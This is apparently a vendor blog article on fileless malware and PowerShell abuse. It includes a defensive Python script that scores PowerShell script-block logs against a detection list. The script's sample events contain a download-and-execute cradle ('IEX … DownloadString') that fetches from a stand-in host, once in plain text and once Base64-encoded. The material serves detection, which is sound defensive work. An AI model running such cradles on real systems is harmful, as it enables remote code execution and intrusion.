If you were to interview the man or woman on the street and ask them to define cybersecurity, a few things might spring from their lips. “Cybersecurity stops Russian hackers” may be one given the current political climate, but another less controversial statement might be “cybersecurity stops malware.” This statement should be no surprise—from the earliest days of endpoint security, stopping malware was solutions providers’ top priority. It’s the most recognized digital threat, and perhaps the most persistent in the history of computers.
Yet, as we here at Solutions Review are fond of saying, those simple days of endpoint security are over. Identity is taking center stage in the popular understanding of cybersecurity, and a new threat is taking malware’s place in the nightmares of IT security experts: fileless malware.
What is fileless malware? Why should your enterprise be concerned? Here’s what you need to know:
What is Fileless Malware?
Malware can refer to any sort of malicious software, but it is most commonly understood as a digital infection that begins with a malicious file being downloaded onto a victim’s server. A fileless malware attack is still malicious and often has the same goals as conventional malware (stealing enterprise data, disrupting business processes, taking control of endpoints, conducting basic digital infiltration, and so on), but crucially it does not involve downloading a file of any sort.
Fileless malware instead abuses applications, software, or programs that are already on the endpoint and that an end-user relies on in day-to-day work, such as Flash Player. Because the attack runs on what is already installed, it is sometimes referred to as a “living off the land” attack. You can also consider it a non-malware attack, as it doesn’t function the way a conventional malware attack would.
How Does Fileless Malware Work?
Massachusetts-based endpoint security solution provider Carbon Black provides an excellent example of how fileless malware works in their recently released “Modern Bank Heists: Cyberattacks & Lateral Movement in the Financial Sector” report.
To summarize: via a phishing attack, the hacker leads the user to a malicious website that runs Flash Player and, through it, PowerShell. PowerShell is an operating system tool built into every Windows endpoint. The attack runs entirely in PowerShell’s memory and never writes a file to disk. The fileless malware then issues a stealthy command to PowerShell, forcing it to run a script that fulfills the hacker’s objectives, such as stealing data. The fileless malware then closes the connection and leaves no trace of itself behind.
Incidentally, PowerShell is the most common fileless malware attack vector according to Carbon Black, constituting 89% of these attacks.
Why Should My Enterprise Be Concerned?
Carbon Black noted that fileless malware attacks now account for more than 50% of successful enterprise breaches. According to their report, 97% of their customers have experienced a fileless malware attack over the past two years. Fileless malware can allow hackers to move laterally throughout your enterprise and its endpoints undetected, granting threat actors “execution freedom” to paraphrase Carbon Black.
And therein lies the rub: traditional and legacy endpoint security solutions are functionally incapable of even detecting fileless malware attacks, much less preventing them. Legacy solutions rely on signature-based detection and scans for malicious files to find threats, and neither applies to fileless malware, which leaves no file to scan.
Hackers have caught on to this, and to the fact that plenty of enterprises haven’t updated their endpoint security solutions. Hence the proliferation of this new wave of digital threats.
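As an added example (not code from the Carbon Black report or from Solutions Review), the following Python script shows what behaviour-based detection of the PowerShell scenario described above looks like, in contrast to the file-signature scanning that legacy tools rely on. It assumes PowerShell Script Block Logging (Windows event ID 4104) is enabled on the endpoint and that events are forwarded as one text line each in a constructed "<timestamp> <host> <event id> <script text>" format. The sample events, the indicator list, its weights and the alert threshold are all constructed for illustration and would need tuning against a real baseline.

```python
"""Behaviour-based triage of PowerShell script block events.

Added example, not from the Carbon Black report or Solutions Review.
Assumes PowerShell Script Block Logging (Windows event ID 4104) is on
and each event arrives as one constructed text line of the form
"<timestamp> <host> <event_id> <script text>".
"""
import base64
import binascii
import re

THRESHOLD = 4  # assumed alert cut-off; tune against your own baseline

# (name, pattern, weight). Each marks code that executes straight from
# memory instead of touching a file, which a file scanner never sees.
INDICATORS = [
    ("encoded_command", r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 3),
    ("download_cradle", r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 3),
    ("invoke_expression", r"\b(?:iex|invoke-expression)\b", 2),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 2),
    ("bypass_policy", r"-e(?:p|xecutionpolicy)\s+bypass", 2),
    ("no_profile", r"-nop(?:rofile)?\b", 1),
    ("base64_decode", r"frombase64string", 1),
]
COMPILED = [(n, re.compile(p, re.I), w) for n, p, w in INDICATORS]
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
EVENT_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d+)\s+(.*)$")


def score_script(script):
    """Return (score, [indicator names]) for one script block text."""
    hits, score = [], 0
    for name, rx, weight in COMPILED:
        if rx.search(script):
            hits.append(name)
            score += weight
    return score, hits


def decode_encoded_command(script):
    """Return the UTF-16LE payload behind -EncodedCommand, or None.

    PowerShell expects Base64 of a UTF-16LE string here; anything that
    does not decode cleanly is treated as not an encoded command.
    """
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(line):
    """Parse one forwarded log line; None if it is not a 4104 event."""
    m = EVENT_RE.match(line)
    if not m or m.group(3) != "4104":
        return None
    host, script = m.group(2), m.group(4)
    score, hits = score_script(script)
    decoded = decode_encoded_command(script)
    if decoded is not None:
        # Rescan the decoded payload so encoding does not hide the cradle.
        d_score, d_hits = score_script(decoded)
        score += d_score
        hits += ["decoded:" + h for h in d_hits]
    return {"host": host, "score": score, "hits": hits,
            "decoded": decoded, "suspicious": score >= THRESHOLD}


def triage(lines):
    """Analyze every line and keep only the script block events."""
    return [r for r in map(analyze_event, lines) if r is not None]


# Constructed sample events for illustration; example.invalid is a reserved name.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    "2023-01-01T10:00:01Z WS01 4104 Get-Service | Where-Object Status -eq 'Running'",
    "2023-01-01T10:00:02Z WS02 4104 powershell -NoProfile -WindowStyle Hidden "
    "-ExecutionPolicy Bypass -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/a')\"",
    f"2023-01-01T10:00:03Z WS03 4104 powershell -enc {ENCODED}",
    "2023-01-01T10:00:04Z WS04 4104 Invoke-WebRequest -Uri https://intranet.example/report.csv "
    "-OutFile C:/temp/report.csv",
    "2023-01-01T10:00:05Z WS05 4688 notepad.exe",  # not a script block event
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['host']:5} score={r['score']:2} {flag:10} {', '.join(r['hits'])}")
```

Run it directly to print one triage line per script block event. The encoded-command sample is only caught because the script decodes the Base64 UTF-16LE payload and rescans it, which is exactly the kind of in-memory inspection a file-signature scanner never performs; the lone intranet download on WS04 stays below the threshold, which is the false-positive trade-off any such weighting has to make.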
What Can My Enterprise Do?
It’s time to seriously examine your enterprise’s endpoint security solution. When was the last time it was updated? When was the last time the vendor updated it?
If the answer to either question is “a long time ago,” then it is time for an upgrade. Your enterprise needs to embrace a new, modern, next-generation endpoint security solution capable of detecting a fileless malware attack before it happens and preventing it.
We’re living in a very different cybersecurity world than the one of only a few years ago. If your endpoint security hasn’t kept up with the changing times, you have virtually no security at all. It’s time to embrace endpoint security innovation before your enterprise is targeted.
Don’t allow this new threat to bully your enterprise. Stand up for your employees, your customers, and yourself.